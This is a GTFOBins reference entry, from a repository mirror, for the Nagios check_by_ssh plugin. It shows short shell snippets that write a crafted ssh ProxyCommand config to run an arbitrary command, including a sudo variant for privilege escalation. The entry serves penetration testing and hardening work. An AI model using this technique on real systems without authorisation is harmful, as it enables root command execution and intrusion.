mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
22 lines
572 B
Markdown
22 lines
572 B
Markdown
---
|
|
description: |
|
|
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
|
|
functions:
|
|
command:
|
|
- code: |
|
|
COMMAND=id
|
|
OUTPUT=output_file
|
|
TF=$(mktemp)
|
|
echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF
|
|
check_by_ssh -F $TF -H localhost -C something
|
|
cat $OUTPUT
|
|
sudo:
|
|
- code: |
|
|
COMMAND=id
|
|
OUTPUT=output_file
|
|
TF=$(mktemp)
|
|
echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF
|
|
sudo check_by_ssh -F $TF -H localhost -C something
|
|
cat $OUTPUT
|
|
---
|